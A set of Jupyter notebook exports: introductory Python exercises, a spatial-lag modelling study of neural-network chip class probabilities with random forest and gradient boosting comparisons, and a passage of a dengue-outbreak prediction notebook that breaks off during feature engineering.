Part 2, Quick Check 1 **Task:** Given a list of prices of a stock on a single day, return `True` if the stock was strictly increasing, and `False` otherwise. A list of numbers is strictly increasing if each one is larger than the previous.
###Code
def strictly_increasing(prices):
i = 0
while i < len(prices) - 1:
if ...:
return False
i += 1
return True
# True
# strictly_increasing([1, 2, 5, 8, 10])
# False
# strictly_increasing([2, 3, 9, 7, 11])
# False
# strictly_increasing([2, 3, 4, 4, 5])
###Output
_____no_output_____
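###Markdown
One possible completion of this quick check (the comparison below is our assumption about the intended blank):
###Code
def strictly_increasing(prices):
    i = 0
    while i < len(prices) - 1:
        if prices[i] >= prices[i + 1]:  # not strictly increasing at this step
            return False
        i += 1
    return True
strictly_increasing([1, 2, 5, 8, 10])
###Output
_____no_output_____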
###Markdown
Next day of the week
###Code
def next_day(day):
week = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
curr = week.index(day)
return week[(curr + 1) % 7]
next_day('Wednesday')
next_day('Saturday')
###Output
_____no_output_____
###Markdown
Prefixes, Quick Check 2
###Code
def full_prefix(name):
# i and idx are short for "index"
idx = name.index('.')
prefix = name[:idx]
rest = ...
if prefix == 'Dr':
return 'Doctor ' + rest
elif prefix == 'Prof':
return 'Professor ' + rest
elif prefix == 'Gov':
return 'Governor ' + rest
else:
return name
# 'Governor Newsom'
# full_prefix('Gov. Newsom')
# 'Professor Christ'
# full_prefix('Prof. Christ')
# 'Doctor Biden'
# full_prefix('Dr. Biden')
# 'Hon. Caboto'
# full_prefix('Hon. Caboto')
###Output
_____no_output_____
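###Markdown
One possible completion of this quick check (the slice below is our assumption about the intended blank; it skips the '. ' that follows the prefix):
###Code
def full_prefix(name):
    idx = name.index('.')
    prefix = name[:idx]
    rest = name[idx + 2:]  # skip the '. ' following the prefix
    if prefix == 'Dr':
        return 'Doctor ' + rest
    elif prefix == 'Prof':
        return 'Professor ' + rest
    elif prefix == 'Gov':
        return 'Governor ' + rest
    else:
        return name
full_prefix('Gov. Newsom')
###Output
_____no_output_____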
###Markdown
Kaprekar's constant
###Code
# For now, ignore the code in this cell.
def increase_sort(n):
n_list = list(str(n))
n_list_sorted = sorted(n_list)
n_str_sorted = ''.join(n_list_sorted)
return int(n_str_sorted)
def decrease_sort(n):
n_list = list(str(n))
n_list_sorted = sorted(n_list)[::-1]
n_str_sorted = ''.join(n_list_sorted)
return int(n_str_sorted)
def find_sequence(n):
# Need to keep track of the steps, and the "current" number in our sequence
steps = [n]
curr = n
# As long as our current number isn't 495
# make one more step, and store the current step
while curr != 495:
curr = decrease_sort(curr) - increase_sort(curr)
steps.append(curr)
return steps
find_sequence(813)
find_sequence(215)
###Output
_____no_output_____ |
ai_experiments/sp_model_chip_probabilities.ipynb | ###Markdown
Modelling of chip probabilities
###Code
import pandas, geopandas
import os, json
from sklearn.ensemble import (
RandomForestClassifier,
GradientBoostingClassifier,
HistGradientBoostingClassifier
)
from sklearn.model_selection import GridSearchCV
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import tools_chip_prob_modelling as tools
###Output
ERROR 1: PROJ: proj_create_from_database: Open of /opt/conda/share/proj failed
###Markdown
Data Probabilities Probabilities for each category by chip, as produced by the neural network:
###Code
probs = geopandas.read_parquet('/home/jovyan/data/32_nw_pred.parquet')
###Output
_____no_output_____
###Markdown
We also keep the names of all classes separate and semantically sorted, as they'll come in handy afterwards:
###Code
tools.class_names
###Output
_____no_output_____
###Markdown
Labels Proportions of observed classes per chip. They are aligned with `probs` so we can remove the `geometry` column.
###Code
labels = pandas.read_parquet(
'/home/jovyan/data/chip_proportions.pq'
).drop('geometry', axis=1)
###Output
_____no_output_____
###Markdown
These are encoded following a grouping described in the JSON model file:
###Code
cd2nm = tools.parse_nn_json(
'/home/jovyan/data/efficientnet_pooling_256_12.json'
)
###Output
_____no_output_____
###Markdown
We replace the code in `labels` by the name and aggregate by column names so we have the proportions in each chip by name rather than code:
###Code
relabels = labels.rename(columns=cd2nm).groupby(level=0, axis=1).sum()
###Output
_____no_output_____
###Markdown
`relabels` contains a few rows with a total probability sum of 0: these are chips that fall within the water. We remove them:
###Code
relabels_nw = relabels[relabels.sum(axis=1) > 0.5] # 0.5 to avoid rounding errors
###Output
_____no_output_____
###Markdown
To begin with, we focus on single class chips. We identify which are single class:
###Code
single_class = relabels_nw.where(relabels_nw==1).sum(axis=1).astype('bool')
single_class.sum() * 100 / single_class.shape[0] # Pct single class
###Output
_____no_output_____
###Markdown
And then pull the class for each of them:
###Code
label = pandas.Categorical(relabels_nw.idxmax(axis=1))
###Output
_____no_output_____
###Markdown
Build `db_all` Single table with probabilities, labels and single-class flag:
###Code
db_all = probs.join(
pandas.DataFrame({'label': label, 'single_class': single_class})
)
db_all['single_class'] = db_all['single_class'].fillna(False)
###Output
_____no_output_____
###Markdown
Note that not all chips have a `label` and `single_class` value. To make sure they are consistent, we replace the `N/A` in `single_class` by `False`. Train/Validation split Next, we split the sample into train and validation sets. The training split proportion is set by the global parameter `TRAIN_FRAC`.
###Code
db_all['train_all'] = False
db_all.loc[
db_all.sample(frac=tools.TRAIN_FRAC, random_state=1234).index, 'train_all'
] = True
###Output
_____no_output_____
###Markdown
Spatial lag Overview Some models will include spatial context. Here we calculate these measures through the spatial lag of the probability for each class. Given we are in a train/validation split context, there are three ways to approach the construction of the lag:1. [`wa`] Absolute lag: we first calculate the lag for each chip, then split between train/validation. This ensures the lag is representative of the geographic context on the ground, but runs the risk of spilling information between train and validation samples. We say here "runs the risk" because the validation chips are _not_ used as focal chips for training and thus the model does not "see" them as such. However, validation chips are _also_ seen by the model as context, and that does make information cross between the sets. We consider this option as a way to explore the extent of this issue. One complication is that this approach also provides more information about geographic context. In the event these models had higher performance (likely), it might not be clear which source is driving the boost: the better representation of geographic context, or the information cross-over between train and validation sets.1. [`ws`] Split lag: here we start by splitting the set into train/validation and then we calculate the spatial lag separately. This is a cleaner way to assess performance, but also one that distorts geographical context so might potentially perform worse than a model that could include a better representation.1. [`wbs`] Block split lag: here we use a different train/validation split that relies on blocks of 3x3 chips to not be separated. Also, we only use focal chips for model fitting and evaluation. This ensures a clean cut between train/val _and_ full geographic context, at the expense of fewer observations in the model.After discussions, we have decided to start with `ws`. Upon further reflection, `wa` implies a clear case of "leakage" of information from the validation into the training sets, and thus "pollutes" the estimates of accuracy. The `wbs` remains valid but two caveats apply: a) a proper implementation of the approach results in an important loss of observations (for every 3x3 block of chips, only one of them enters the modeling), and this probably has an important effect on smaller classes such as the urbanities; b) at a theoretical level, it is still not clear it's the preferred approach (see [Wadoux et al. 2021](https://www.sciencedirect.com/science/article/pii/S0304380021002489?via=ihub) for context). On this last point, my (DA-B) sense is that it still makes sense to block in smaller chunks and split those between train and validation because you want to ensure that the effect of context is characterised adequately, and the risk of not picking up the variation desired in both training and validation sets (the main concern of Wadoux et al. 2021) is lessened by blocking at a relatively small scale and randomly sampling from those blocks. Split lag
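Before running the computation, here is a minimal sketch of what a within-split lag could look like (an illustration using `libpysal`; the actual `tools.lag_columns` helper may differ in detail):
###Code
from libpysal import weights

def lag_columns_sketch(gdf, cols):
    # Queen contiguity built within this split only; row-standardised so the
    # lag of each probability is a local average over available neighbours
    w = weights.Queen.from_dataframe(gdf)
    w.transform = 'R'
    lagged = gdf[cols].apply(lambda col: weights.lag_spatial(w, col))
    lagged.columns = ['w_' + c for c in cols]
    lagged['card'] = pandas.Series(w.cardinalities).values  # neighbour counts
    lagged['island'] = lagged['card'] == 0
    return lagged
###Output
_____no_output_____
###Markdown
Now the actual computation, run separately within the train and validation sets: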
###Code
lag_all = db_all.groupby('train_all').apply(
tools.lag_columns, cols=tools.class_names
)
###Output
/opt/conda/lib/python3.9/site-packages/libpysal/weights/weights.py:172: UserWarning: The weights matrix is not fully connected:
There are 4895 disconnected components.
 There are 1771 islands with ids: 11, 13, 14, 15, 28, 44, 46, 52, 53, 66, 71, 140, 156, 175, ...
warnings.warn(message)
###Markdown
To make things handier later, we grab the names of the lagged variables separately:
###Code
w_class_names = ['w_'+i for i in tools.class_names]
###Output
_____no_output_____
###Markdown
Spatially lagging the split chips will give rise to islands (chips that do not have any neighbors). This will mean later on, when we consolidate the table for models, we will have to drop island observations and, if there is a systematic bias in the group (train/val) where we drop more, it might induce further issues down the line.
###Code
sns.displot(
lag_all.assign(
train_all=db_all['train_all'].map({True: "Train", False: "Validation"})
),
x='card',
hue='train_all',
element='step',
aspect=2,
height=3
);
###Output
_____no_output_____
###Markdown
Cardinalities clearly differ: training observations (a larger group) have more neighbors on average. This is potentially a problem in that the validation set is _not_ mimicking the training one. However, the direction of the difference might be such that evaluation metrics could be taken as a _lower_ bound: the model is trained using more information from context but evaluated with less; performance will be evaluated under "worse" conditions than it's been trained on so, everything else being equal, it'd give lower scores than the model actually should. **DA-B**: discuss with MF whether this is the case
###Code
corrs = tools.build_prob_wprob_corrs(
tools.class_names, w_class_names, db_all, lag_all
)
###Output
_____no_output_____
###Markdown
As an exploration, here we have the correlation between high probability in a given class, and high probability in other classes in the spatial lag (geographic context). There is a clear pattern of non-zero correlations.
###Code
h = sns.heatmap(corrs, vmin=0, vmax=1, cmap='viridis')
h.set_xticklabels(h.get_xticklabels(), rotation = 45, ha="right");
###Output
_____no_output_____
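###Markdown
For reference, these correlations could be computed directly along these lines (a sketch; the `tools.build_prob_wprob_corrs` helper may differ in detail):
###Code
corrs_sketch = pandas.concat(
    [db_all[tools.class_names], lag_all[w_class_names]], axis=1
).corr().loc[tools.class_names, w_class_names]
###Output
_____no_output_____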
###Markdown
Block Split lag`[TBA]` Interaction variables Here we develop a set of interaction variables between the probability of each class and their spatial lag. In mathematical terms, the expected probability $\mu_i$ for chip $i$ in our base model is:$$\mu_i = \alpha + \sum_k P_{ki} \beta_k$$When we include the spatial lag, this becomes:$$\mu_i = \alpha + \sum_k P_{ki} \beta_k + \sum_k WP_{ki} \gamma_k$$The idea with interactions is to model the probability expectation as:$$\mu_i = \alpha + \sum_k P_{ki} \beta_k + \sum_k WP_{ki} \gamma_k + \sum_k \sum_{k'} P_{ki} \times WP_{k'i} \delta_{kk'}$$ Here we build a method to construct the last term in the equation above ($\sum_k \sum_{k'} P_{ki} \times WP_{k'i}$), which will be used when fitting some of the models below (a sketch of this construction is shown later, alongside the interacted logit model). Build `db` Finally, we bring together in a single, clean table information on the original probabilities, their spatial lags, and class label. To make sure it is analysis-ready, we retain only single-class chips that are _not_ islands (i.e., have at least one neighbor).
###Code
db = db_all.join(
lag_all
).query(
'(single_class == True) & (island == False)'
).drop(['single_class', 'island'], axis=1)
###Output
_____no_output_____
###Markdown
The dropping of observations that happened above might also induce additional biases. **DA-B**: Explore further the distribution of values between train/val sets (e.g. heatmaps/hists before the split and after). Extract train/val indices Now we have the set ready, we can pick out train/val indices as the modeling will expect them.
###Code
train_ids = db.query('train_all == True').index
val_ids = db.query('train_all == False').index
###Output
_____no_output_____
###Markdown
Class (im)balance The spatial lag step might be introducing bias in the sample before modelling. We pick all the single class chips and split them randomly between train and validation. If spatially lagging has a systematic effect on some classes (e.g., some classes get dropped more often), this might introduce bias that will make our model scores unreliable. To explore this case, we want to get an idea of: - [x] Overall proportion of train/val before (`db_all` single class) and after spatially lagging (`db`)
###Code
pandas.DataFrame(
{
'before_lag': db_all.query('single_class').value_counts(
'train_all'
) * 100 / len(db_all.query('single_class')),
'after_lag': db.value_counts('train_all') * 100 / len(db)
}
).rename({True: 'Training', False: 'Validation'})
###Output
_____no_output_____
###Markdown
- [x] Proportion by class in the set before spatially lagging and after --> `Fig. Balance (b)`
###Code
props = pandas.DataFrame(
{
'before_lag': pandas.value_counts(
db_all.query('single_class')['label']
) * 100 / len(db_all.query('single_class')),
'after_lag': pandas.value_counts(
db['label']
) * 100 / len(db['label'])
}
)
p = props.reindex(tools.class_names).plot.bar(figsize=(9, 3), title='Fig. Balance (b)')
p.set_xticklabels(p.get_xticklabels(), rotation = 45, ha="right");
###Output
_____no_output_____
###Markdown
Single class models Models to evaluate:

| Algorithm / Features | Baseline | Baseline + $WX$ | Baseline + $WX$ + $X\times WX$ |
|----------------------|----------|-----------------|--------------------------------|
| Max. Prob | `mp_res` | N/A | N/A |
| Logit ensemble | `logite_baseline_res` | `logite_wx_res` | Singular matrix |
| MNLogit | Does not converge | Does not converge | - |
| Random Forest | `rf_baseline_res` | `rf_wx_res` | N/A |
| XGBoost | `hbgb_baseline_res` | `hbgb_wx_res` | N/A |

Evaluation workflow:
1. Split train/validation randomly (e.g., 70/30)
1. Fit model on train subset
1. Obtain `perf_` measures on validation subset
1. Fill `results.json` file

Format:
```json
{
    "meta_n_class": ,
    "meta_class_names": ,
    "meta_trainval_counts": ,
    "model_name": ,
    "model_params": ,
    "meta_runtime": ,
    "meta_preds_path": ,
    "perf_model_accuracy_train": ,
    "perf_within_class_accuracy_train": ,
    "perf_confusion_train": ,
    "perf_model_accuracy_val": ,
    "perf_within_class_accuracy_val": ,
    "perf_confusion_val": ,
    "notes": ,
}
```
###Code
res_path = '/home/jovyan/data/model_outputs/'
###Output
_____no_output_____
###Markdown
Flush `db` to disk for availability later on:
###Code
db.to_parquet(os.path.join(res_path, 'db.pq'))
###Output
/tmp/ipykernel_2134/473553071.py:1: UserWarning: this is an initial implementation of Parquet/Feather file support and associated metadata. This is tracking version 0.1.0 of the metadata specification at https://github.com/geopandas/geo-arrow-spec
This metadata specification does not yet make stability promises. We do not yet recommend using this in a production setting unless you are able to rewrite your Parquet/Feather files.
To further ignore this warning, you can do:
import warnings; warnings.filterwarnings('ignore', message='.*initial implementation of Parquet.*')
db.to_parquet(os.path.join(res_path, 'db.pq'))
###Markdown
Max. Probability This is a baseline that selects as the predicted category the one that displays the highest probability, as stored in `probs`. We can consider this the baseline upon which other models will improve.
###Code
mp_res = tools.run_maxprob(
tools.class_names, 'label', db, train_ids, val_ids, 'baseline', res_path
)
###Output
_____no_output_____
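###Markdown
For intuition, the prediction rule presumably amounts to something like the following (a sketch only; `tools.run_maxprob` also handles scoring and persistence, and may differ in detail):
###Code
pred_val = db.loc[val_ids, tools.class_names].idxmax(axis=1)
accuracy_val = (pred_val == db.loc[val_ids, 'label']).mean()
###Output
_____no_output_____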
###Markdown
Logit ensemble Our approach here consists of fitting individual logistic regressions to predict each class against all other ones. With these models, we obtain a probability for each class, and pick the one with the largest probability as the predicted class.---**NOTE (DA-B)**: this might not be right if different logits have different distributions of probabilities. Maybe replace the probability by the rank and pick the largest rank as the predicted class?---Two methods, `logite_fit` to fit each class model, and `logite_predict` to generate predicted classes from a set of arbitrary features. Baseline
###Code
from importlib import reload
reload(tools);
logite_baseline_res = tools.run_logite(
tools.class_names, 'label', db, train_ids, val_ids, 'baseline', res_path
)
###Output
/opt/conda/lib/python3.9/site-packages/sklearn/preprocessing/_data.py:258: UserWarning: Numerical issues were encountered when scaling the data and might not be solved. The standard deviation of the data is probably very close to 0.
warnings.warn(
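###Markdown
For intuition, a one-vs-rest ensemble along these lines could be written as follows (a sketch only; assumptions: sklearn's `LogisticRegression` with no feature scaling, whereas the actual `tools.run_logite` helper may transform features and differ in detail):
###Code
from sklearn.linear_model import LogisticRegression

def logite_sketch(X_train, y_train, X_val, classes):
    # One binary logit per class; predicted class = argmax of per-class probs
    probs = {}
    for c in classes:
        m = LogisticRegression(max_iter=1000).fit(X_train, y_train == c)
        probs[c] = m.predict_proba(X_val)[:, 1]
    return pandas.DataFrame(probs, index=X_val.index).idxmax(axis=1)
###Output
_____no_output_____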
###Markdown
Baseline + $WX$
###Code
logite_wx_res = tools.run_logite(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
'baseline_wx',
res_path
)
###Output
Optimization terminated successfully.
Current function value: 0.657119
Iterations 6
Optimization terminated successfully.
Current function value: 0.604344
Iterations 6
Optimization terminated successfully.
Current function value: 0.676905
Iterations 5
Optimization terminated successfully.
Current function value: 0.692461
Iterations 4
Optimization terminated successfully.
Current function value: 0.692309
Iterations 4
Optimization terminated successfully.
Current function value: 0.668075
Iterations 6
Optimization terminated successfully.
Current function value: 0.692096
Iterations 4
Optimization terminated successfully.
Current function value: 0.687466
Iterations 4
Optimization terminated successfully.
Current function value: 0.692777
Iterations 4
Optimization terminated successfully.
Current function value: 0.693107
Iterations 3
Optimization terminated successfully.
Current function value: 0.693127
Iterations 3
Optimization terminated successfully.
Current function value: 0.684861
Iterations 4
###Markdown
Baseline + $WX$ + $X\times WX$
###Code
logite_xwx_res = tools.run_logite(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
'baseline_wx_xwx',
'model_results/',
scale_x=False,
log_x=True,
interact=(tools.class_names, w_class_names)
)
###Output
_____no_output_____
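###Markdown
The `interact` argument above presumably triggers the construction of the pairwise products $P_{ki} \times WP_{k'i}$ inside the helper. A minimal sketch of such a construction (illustrative only; the actual implementation in `tools_chip_prob_modelling` may differ):
###Code
def interact_probs_sketch(df, cols, w_cols):
    # One new feature per (class, lagged class) pair
    out = {}
    for c in cols:
        for wc in w_cols:
            out[c + '_x_' + wc] = df[c] * df[wc]
    return pandas.DataFrame(out, index=df.index)
###Output
_____no_output_____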
###Markdown
Multinomial Logit For this we rely on the `statsmodels` [implementation](https://www.statsmodels.org/stable/examples/notebooks/generated/discrete_choice_overview.html#Multinomial-Logit) and fit it to the standardised log of the original probabilities to make convergence possible:
###Code
from time import time
import statsmodels.api as sm
from sklearn.preprocessing import scale

X_train = pandas.DataFrame(
    scale(np.log1p(db.loc[train_ids, tools.class_names + w_class_names])),
    train_ids, tools.class_names + w_class_names
)
t0 = time()
mlogit_mod = sm.MNLogit(db.loc[train_ids, 'label'], X_train)
mlogit_res = mlogit_mod.fit()
from importlib import reload
reload(tools);
###Output
_____no_output_____
###Markdown
Baseline
###Code
mlogit_res = tools.run_mlogit(
tools.class_names, 'label', db, train_ids, val_ids, 'baseline', 'model_results/'
)
###Output
/opt/conda/lib/python3.9/site-packages/sklearn/preprocessing/_data.py:235: UserWarning: Numerical issues were encountered when centering the data and might not be solved. Dataset may contain too large values. You may need to prescale your features.
warnings.warn(
/opt/conda/lib/python3.9/site-packages/sklearn/preprocessing/_data.py:254: UserWarning: Numerical issues were encountered when scaling the data and might not be solved. The standard deviation of the data is probably very close to 0.
warnings.warn(
/opt/conda/lib/python3.9/site-packages/statsmodels/discrete/discrete_model.py:2299: RuntimeWarning: overflow encountered in exp
eXB = np.column_stack((np.ones(len(X)), np.exp(X)))
/opt/conda/lib/python3.9/site-packages/statsmodels/discrete/discrete_model.py:2300: RuntimeWarning: invalid value encountered in true_divide
return eXB/eXB.sum(1)[:,None]
###Markdown
Baseline + $WX$
###Code
mlogit_wx = tools.run_mlogit(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
    'baseline_wx',
'model_results/'
)
###Output
_____no_output_____
###Markdown
Random Forest
###Code
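# Note: a small grid for quick test runs is defined first, then immediately
# overwritten by the full grid actually used in the search below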
rf_param_grid = {
'n_estimators': [150],
'max_depth': [5],
'max_features': [0.25, 'sqrt']
}
rf_param_grid = {
'n_estimators': [50, 100, 150, 200, 300],
'max_depth': [5, 10, 20, 30, None],
'max_features': [0.25, 0.5, 0.75, 1, 'sqrt', 'log2']
}
###Output
_____no_output_____
###Markdown
Baseline - Grid search
###Code
%%time
grid = GridSearchCV(
RandomForestClassifier(),
rf_param_grid,
scoring='accuracy',
cv=5,
n_jobs=-1
)
grid.fit(
db.query('train_all')[tools.class_names],
db.query('train_all')['label']
)
pandas.DataFrame(grid.cv_results_).to_csv(
os.path.join(res_path, 'RandomForestClassifier_baseline.csv')
)
print(grid.best_params_)
###Output
/opt/conda/lib/python3.9/site-packages/joblib/externals/loky/process_executor.py:702: UserWarning: A worker stopped while some jobs were given to the executor. This can be caused by a too short worker timeout or by a memory leak.
warnings.warn(
###Markdown
- Model fitting
###Code
rf_baseline_res = tools.run_tree(
tools.class_names,
'label',
db,
train_ids,
val_ids,
RandomForestClassifier(**grid.best_params_),
'baseline',
res_path
)
###Output
_____no_output_____
###Markdown
Baseline + $WX$ - Grid search
###Code
%%time
grid = GridSearchCV(
RandomForestClassifier(),
rf_param_grid,
scoring='accuracy',
cv=5,
n_jobs=-1
)
grid.fit(
db.query('train_all')[tools.class_names + w_class_names],
db.query('train_all')['label']
)
pandas.DataFrame(grid.cv_results_).to_csv(
os.path.join(res_path, 'RandomForestClassifier_baseline_wx.csv')
)
print(grid.best_params_)
###Output
/opt/conda/lib/python3.9/site-packages/joblib/externals/loky/process_executor.py:702: UserWarning: A worker stopped while some jobs were given to the executor. This can be caused by a too short worker timeout or by a memory leak.
warnings.warn(
###Markdown
- Model fitting
###Code
rf_wx_res = tools.run_tree(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
RandomForestClassifier(**grid.best_params_),
'baseline_wx',
res_path
)
###Output
_____no_output_____
###Markdown
Histogram-Based Gradient Boosting See [documentation](https://scikit-learn.org/stable/modules/ensemble.html#histogram-based-gradient-boosting) for the meaning and approaches to the hyper-parameters.
###Code
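# As above, a small grid for quick test runs is immediately overwritten
# by the full grid used in the search below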
hbgb_param_grid = {
'max_iter': [50],
'learning_rate': [0.01, 0.05],
'max_depth': [30, None],
}
hbgb_param_grid = {
'max_iter': [50, 100, 150, 200, 300],
'learning_rate': [0.01, 0.05] + np.linspace(0, 1, 11)[1:].tolist(),
'max_depth': [5, 10, 20, 30, None],
}
###Output
_____no_output_____
###Markdown
Baseline - Grid search:
###Code
%%time
grid = GridSearchCV(
HistGradientBoostingClassifier(),
hbgb_param_grid,
scoring='accuracy',
cv=5,
n_jobs=-1
)
grid.fit(
db.query('train_all')[tools.class_names], db.query('train_all')['label']
)
pandas.DataFrame(grid.cv_results_).to_csv(
os.path.join(res_path, 'HistGradientBoostingClassifier_baseline.csv')
)
print(grid.best_params_)
###Output
_____no_output_____
###Markdown
- Model fitting
###Code
hbgb_baseline_res = tools.run_tree(
tools.class_names,
'label',
db,
train_ids,
val_ids,
HistGradientBoostingClassifier(**grid.best_params_),
'baseline',
res_path
)
###Output
_____no_output_____
###Markdown
Baseline + $WX$ - Grid search:
###Code
%%time
grid = GridSearchCV(
HistGradientBoostingClassifier(),
hbgb_param_grid,
scoring='accuracy',
cv=5,
n_jobs=-1
)
grid.fit(
db.query('train_all')[tools.class_names + w_class_names],
db.query('train_all')['label']
)
pandas.DataFrame(grid.cv_results_).to_csv(
os.path.join(res_path, 'HistGradientBoostingClassifier_baseline_wx.csv')
)
print(grid.best_params_)
###Output
_____no_output_____
###Markdown
- Model fitting
###Code
hbgb_wx_res = tools.run_tree(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
HistGradientBoostingClassifier(max_iter=100),
'baseline_wx',
res_path
)
###Output
_____no_output_____
###Markdown
---**NOTE** - As of April 21st'22, standard gradient-boosted trees are deprecated due to their long training time and similar performance to histogram-based ones. Gradient Tree Boosting See [documentation](https://scikit-learn.org/stable/modules/ensemble.html#gradient-boosting) for the meaning and approaches to the hyper-parameters (mostly `n_estimators` and `learning_rate`). Baseline
###Code
gbt_baseline_res = tools.run_tree(
    tools.class_names,
    'label',
    db,
    train_ids,
    val_ids,
    GradientBoostingClassifier(n_estimators=50, learning_rate=1.),
    'baseline',
    'model_results/'
)
###Output
_____no_output_____
###Markdown
Baseline + $WX$
###Code
gbt_wx_res = tools.run_tree(
    tools.class_names + w_class_names,
    'label',
    db,
    train_ids,
    val_ids,
    GradientBoostingClassifier(n_estimators=50, learning_rate=1.),
    'baseline_wx',
    'model_results/'
)
###Output
_____no_output_____ |
V1_classification_exercise_XGBoost_Bhav_DengueAI_Project.ipynb | ###Markdown
###Code
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#https://www.drivendata.org/competitions/44/dengai-predicting-disease-spread/page/80/
#Your goal is to predict the total_cases label for each (city, year, weekofyear) in the test set.
#Performance metric = mean absolute error
###Output
_____no_output_____
###Markdown
LIST OF FEATURES: You are provided the following set of information on a (year, weekofyear) timescale. (Where appropriate, units are provided as a _unit suffix on the feature name.)
City and date indicators
1. city – City abbreviations: sj for San Juan and iq for Iquitos
2. week_start_date – Date given in yyyy-mm-dd format
NOAA's GHCN daily climate data weather station measurements
1. station_max_temp_c – Maximum temperature
2. station_min_temp_c – Minimum temperature
3. station_avg_temp_c – Average temperature
4. station_precip_mm – Total precipitation
5. station_diur_temp_rng_c – Diurnal temperature range
PERSIANN satellite precipitation measurements (0.25x0.25 degree scale)
6. precipitation_amt_mm – Total precipitation
NOAA's NCEP Climate Forecast System Reanalysis measurements (0.5x0.5 degree scale)
7. reanalysis_sat_precip_amt_mm – Total precipitation
8. reanalysis_dew_point_temp_k – Mean dew point temperature
9. reanalysis_air_temp_k – Mean air temperature
10. reanalysis_relative_humidity_percent – Mean relative humidity
11. reanalysis_specific_humidity_g_per_kg – Mean specific humidity
12. reanalysis_precip_amt_kg_per_m2 – Total precipitation
13. reanalysis_max_air_temp_k – Maximum air temperature
14. reanalysis_min_air_temp_k – Minimum air temperature
15. reanalysis_avg_temp_k – Average air temperature
16. reanalysis_tdtr_k – Diurnal temperature range
Satellite vegetation – Normalized difference vegetation index (NDVI) – NOAA's CDR Normalized Difference Vegetation Index (0.5x0.5 degree scale) measurements
17. ndvi_se – Pixel southeast of city centroid
18. ndvi_sw – Pixel southwest of city centroid
19. ndvi_ne – Pixel northeast of city centroid
20. ndvi_nw – Pixel northwest of city centroid
TARGET VARIABLE = total_cases label for each (city, year, weekofyear)
###Code
import sys
#Load train features and labels datasets
train_features = pd.read_csv('https://s3.amazonaws.com/drivendata/data/44/public/dengue_features_train.csv')
train_features.head()
train_features.shape
train_labels = pd.read_csv('https://s3.amazonaws.com/drivendata/data/44/public/dengue_labels_train.csv')
train_labels.head()
train_labels.shape
#Merge train features and labels datasets
train = pd.merge(train_features, train_labels)
train.head()
train.shape
#city, year and weekofyear columns are duplicated across train_features and train_labels, so the merge simply adds the total_cases column to the features dataset
train.dtypes
train['total_cases'].describe()
dengue_cases = train['total_cases']
dengue_cases
np.percentile(dengue_cases, 95)
#Thus, we can flag rows with total_cases > 81.25 as dengue outbreaks, since they lie above the 95th percentile (about 1.6 S.D. above the mean for a normal distribution)
#create a new column 'dengue_outbreak' with total_cases >81.25 and drop total_cases column
train['dengue_outbreak'] = train['total_cases'] > 81.25
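# A more robust alternative (sketch, not run here): derive the cutoff from the data
# instead of hard-coding 81.25, so it stays correct if the training set changes.
# outbreak_threshold = np.percentile(train['total_cases'], 95)
# train['dengue_outbreak'] = train['total_cases'] > outbreak_threshold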
#Can do Pandas profiling here
#Do train, val split
from sklearn.model_selection import train_test_split
train, val = train_test_split(train, train_size=0.80, test_size=0.20,
stratify=train['dengue_outbreak'],
random_state=42, )
train.shape, val.shape
#Baseline statistics for the target variable total_cases in train dataset
train['dengue_outbreak'].value_counts(normalize=True)
#Thus, dengue outbreaks occur only in 4.98% of cases in train dataset and are minority class
#we need to convert week_start_date to numeric form using the pd.to_datetime function
#wrangle function
def wrangle(X):
    X = X.copy()
    # Convert week_start_date to numeric form
    X['week_start_date'] = pd.to_datetime(X['week_start_date'], infer_datetime_format=True)
    # Extract components from week_start_date, then drop the original column
    X['year_recorded'] = X['week_start_date'].dt.year
    X['month_recorded'] = X['week_start_date'].dt.month
    #X['day_recorded'] = X['week_start_date'].dt.day
    X = X.drop(columns='week_start_date')
    X = X.drop(columns='year')
    # I engineered a few features that represent standing water, a high-risk factor for mosquitoes
    X['standing water feature 1'] = X['station_precip_mm'] / X['station_max_temp_c']
    X['total satellite vegetation index of city'] = X['ndvi_se'] + X['ndvi_sw'] + X['ndvi_ne'] + X['ndvi_nw']
    # 2. standing water feature 2 = reanalyzed precipitation (kg/m2) * total vegetation (sum of all 4 parts of the city)
    X['standing water feature 2'] = X['reanalysis_precip_amt_kg_per_m2'] * X['total satellite vegetation index of city']
    # 3. standing water feature 3 = reanalyzed precipitation (kg/m2) * mean relative humidity (%)
    X['standing water feature 3'] = X['reanalysis_precip_amt_kg_per_m2'] * X['reanalysis_relative_humidity_percent']
    # 4. standing water feature 4 = reanalyzed precipitation (kg/m2) * mean relative humidity (%) * total vegetation
    X['standing water feature 4'] = X['reanalysis_precip_amt_kg_per_m2'] * X['reanalysis_relative_humidity_percent'] * X['total satellite vegetation index of city']
    # 5. standing water feature 5 = reanalyzed precipitation (kg/m2) / reanalyzed max air temp (K)
    X['standing water feature 5'] = X['reanalysis_precip_amt_kg_per_m2'] / X['reanalysis_max_air_temp_k']
    # 6. standing water feature 6 (most important) = [precipitation * mean relative humidity * total vegetation] / max air temp
    X['standing water feature 6'] = X['reanalysis_precip_amt_kg_per_m2'] * X['reanalysis_relative_humidity_percent'] * X['total satellite vegetation index of city'] / X['reanalysis_max_air_temp_k']
    # Rename columns to human-readable names
    X.rename(columns={
        'reanalysis_air_temp_k': 'Mean air temperature in K',
        'reanalysis_min_air_temp_k': 'Minimum air temperature in K',
        'weekofyear': 'Week of Year',
        'station_diur_temp_rng_c': 'Diurnal temperature range in C',
        'reanalysis_precip_amt_kg_per_m2': 'Total precipitation kg/m2',
        'reanalysis_tdtr_k': 'Diurnal temperature range in K',
        'reanalysis_max_air_temp_k': 'Maximum air temperature in K',
        'year_recorded': 'Year recorded',
        'reanalysis_relative_humidity_percent': 'Mean relative humidity',
        'month_recorded': 'Month recorded',
        'reanalysis_dew_point_temp_k': 'Mean dew point temp in K',
        'precipitation_amt_mm': 'Total precipitation in mm',
        'station_min_temp_c': 'Minimum temp in C',
        'ndvi_se': 'Southeast vegetation index',
        'ndvi_ne': 'Northeast vegetation index',
        'ndvi_nw': 'Northwest vegetation index',
        'ndvi_sw': 'Southwest vegetation index',
        'reanalysis_avg_temp_k': 'Average air temperature in K',
